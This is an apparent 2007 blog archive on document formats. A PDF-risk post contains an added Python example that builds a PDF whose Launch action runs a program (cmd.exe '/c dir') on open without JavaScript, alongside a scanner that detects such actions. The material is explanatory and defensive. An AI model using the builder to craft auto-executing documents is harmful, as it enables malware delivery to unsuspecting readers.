Tuesday, August 28, 2007
Open XML: "No with comments"
Rick Jelliffe argues that Open XML needs more work before it becomes an ISO standard.
The comments are interesting too.
Labels: XML
Friday, August 24, 2007
A note on PDF risks
A week ago, I raised the question of risks in PDF documents. That got me wondering about the risks involved in Launch Actions, so I put together a handmade PDF that contained a Launch Action triggered by viewing a page. If this launch happened unimpeded, it could be a serious security risk, as malware could deliver a one-two punch by first delivering an executable and then getting a PDF reader to launch it.
In the testing I've done so far, all versions of Acrobat Reader which I've tried simply ignore the launch action. The JavaScript setting seems to have no effect. A full version of Acrobat for Mac OS X offered to launch the program I selected, but first put up a warning that asked me whether I wanted to proceed.
However, nothing in the PDF spec requires a warning, so it's possible that some readers will blindly launch whatever is asked for. These may not be common enough for malware creators to consider them worth exploiting. If you're interested in experimenting with it, the file is here. It will merely attempt to launch C:\WINDOWS\system32\cmd.exe, so it's harmless even if the launch goes through.
Labels: PDF
US votes for Open XML
As reported on the Open XML Formats blog, the US has voted to approve Open XML as an ISO standard. This isn't the final word, but it's a major step toward approval.
Labels: XML
Friday, August 17, 2007
Is malicious PDF a danger?
Adobe has said that PDF documents attached to spam pose no security risk. Adobe certainly would like this to be true, but any such claim needs to be examined with skepticism.
The PDF spec includes a "Launch" action which can be triggered by clicking on something harmless-looking, or just by moving to a page. Parameters can be provided to the application, giving the launching document a lot of flexibility. A spam mail which contains two attachments, a PDF document and an EXE file which it launches, could be a deadly combination.
In addition, arbitrary media types can be embedded in a PDF file. These will be played (to use Adobe's generic term) only if the PDF reader supports them, but vulnerabilities in standard libraries for any of these media can become vulnerabilities in PDF.
The standard advice is the right advice: Don't open attachments from untrusted sources.
Discussion of some risks in PDF is available here. The claim that disabling JavaScript in the PDF reader prevents launch actions is not correct; launch actions can be used without JavaScript.
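To make the point concrete for both this post and the Launch Action experiment above, here is an added example (my own code, not from either post): a builder that writes the same kind of hand-made PDF, a one-page file whose Launch action fires from the page's /AA /O (page open) entry or the catalog's /OpenAction entry with no JavaScript anywhere in the file, and a scanner that finds Launch actions and reports which trigger reaches them. The target program, the command-line parameters and the sample documents are constructed for illustration; cmd.exe is used as the harmless target, as in the experiment.

```python
"""Hand-built PDF with a Launch action, plus a scanner that finds such actions.

Added example for the PDF Launch posts; not code from the posts themselves.
The target program, parameters and sample documents are constructed here.
"""
import re


def pdf_string(s: str) -> bytes:
    """Encode s as a PDF literal string, escaping backslash and parentheses."""
    s = s.replace("\\", "\\\\").replace("(", "\\(").replace(")", "\\)")
    return b"(" + s.encode("latin-1") + b")"


def pdf_unstring(raw: bytes) -> str:
    """Undo the escapes above (octal escapes are left alone; enough for a scan)."""
    return re.sub(rb"\\(.)", lambda m: m.group(1), raw).decode("latin-1")


def build_launch_pdf(target: str, params: str = "", trigger: str = "page") -> bytes:
    """Return a one-page PDF whose Launch action fires without any JavaScript.

    trigger="page": the action hangs off the page's /AA /O (page open) entry.
    trigger="doc":  the action hangs off the catalog's /OpenAction entry.
    A /Win sub-dictionary carries command-line parameters when given.
    """
    action = b"<< /Type /Action /S /Launch /F " + pdf_string(target)
    if params:
        action += b" /Win << /F " + pdf_string(target) + b" /P " + pdf_string(params) + b" >>"
    action += b" >>"
    catalog = b"<< /Type /Catalog /Pages 2 0 R"
    page = b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792]"
    if trigger == "doc":
        catalog += b" /OpenAction 4 0 R"
    else:
        page += b" /AA << /O 4 0 R >>"
    objects = [catalog + b" >>", b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
               page + b" >>", action]          # object 4 is the Launch action
    out, offsets = b"%PDF-1.4\n", []
    for num, obj in enumerate(objects, start=1):
        offsets.append(len(out))
        out += b"%d 0 obj\n%s\nendobj\n" % (num, obj)
    xref_pos = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objects) + 1)
    for off in offsets:
        out += b"%010d 00000 n \n" % off      # each xref entry is exactly 20 bytes
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (
        len(objects) + 1, xref_pos)
    return out


OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)endobj", re.DOTALL)
LAUNCH_RE = re.compile(rb"/S\s*/Launch\b")
FILE_RE = re.compile(rb"/F\s*\(((?:[^()\\]|\\.)*)\)")
PARAM_RE = re.compile(rb"/P\s*\(((?:[^()\\]|\\.)*)\)")
# trigger name -> (pattern for an indirect reference "N 0 R", pattern for an inline dict)
TRIGGERS = {
    "document open": (rb"/OpenAction\s+%s", rb"/OpenAction\s*<<[^>]*/S\s*/Launch"),
    "page open": (rb"/AA\s*<<[^>]*/O\s+%s", rb"/O\s*<<[^>]*/S\s*/Launch"),
    "click": (rb"/Subtype\s*/Link.*?/A\s+%s", rb"/Subtype\s*/Link.*?/A\s*<<[^>]*/S\s*/Launch"),
}


def find_launch_actions(pdf: bytes) -> list:
    """Report every Launch action in an uncompressed PDF: the file it would run,
    its parameters, and the trigger(s) that reach it. Only plain object syntax is
    scanned; objects inside compressed object streams (/ObjStm) need inflating first."""
    objects = {int(m.group(1)): m.group(3) for m in OBJ_RE.finditer(pdf)}
    findings = []
    for num, body in objects.items():
        if not LAUNCH_RE.search(body):
            continue
        ref = rb"\b%d\s+0\s+R\b" % num
        triggers = set()
        for name, (by_ref, inline) in TRIGGERS.items():
            if re.search(inline, body, re.DOTALL):
                triggers.add(name)
            if any(re.search(by_ref % ref, other, re.DOTALL) for other in objects.values()):
                triggers.add(name)
        f, p = FILE_RE.search(body), PARAM_RE.search(body)
        findings.append({"object": num,
                         "file": pdf_unstring(f.group(1)) if f else "",
                         "params": pdf_unstring(p.group(1)) if p else "",
                         "triggers": sorted(triggers)})
    return findings


if __name__ == "__main__":
    sample = build_launch_pdf(r"C:\WINDOWS\system32\cmd.exe", "/c dir")
    for hit in find_launch_actions(sample):
        print(hit)
```

The scanner deliberately checks nothing about /JavaScript: the action is ordinary dictionary data, which is why the JavaScript setting cannot stop it. Real samples rarely present themselves this plainly; the action usually sits in a FlateDecode-compressed object stream, and names can be hex-escaped (/Laun#63h), so run a byte-level check like this only after the file has been decompressed and normalized, or use a proper PDF parser that walks the object tree.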
Labels: PDF
Thursday, August 16, 2007
JPEG2000: Coming soon to a theatre near you
JPEG2000 has found a niche in digital cinema, strengthened by Digital Cinema Initiatives' approval of the JPEG2000-based DCI specification 1.1 for distribution of digital movies to theatres. Transformers and Harry Potter and the Order of the Phoenix are among the movies that have already been released in JPEG2000.
Labels: JPEG
Thursday, August 09, 2007
Should there be an ISO ZIP standard?
Rick Jelliffe discusses why there should be an ISO standard for ZIP. It's really surprising that there isn't, given how many other formats are built on ZIP. The PKWARE definition of ZIP is merely referenced by ODF and Open Office. The specification looks pretty good, though of course a fine-toothed comb is necessary to find any ambiguities. It designates some fields as "Reserved for use by PKWARE," which is undesirable in a vendor-neutral format. The description of spanning and splitting is rather ad hoc; spanning requires "writing each segment to a unique removable medium" and giving them all the same name. I'm sure there are other things that could be cleaned up.
Labels: ZIP
Thursday, August 02, 2007
Digital Commonwealth conference
Possibly of interest to people around Massachusetts:
Second Annual Digital Library Conference and Vendor Fair
October 25, 2007
Hogan Center, College of the Holy Cross
Worcester, Massachusetts
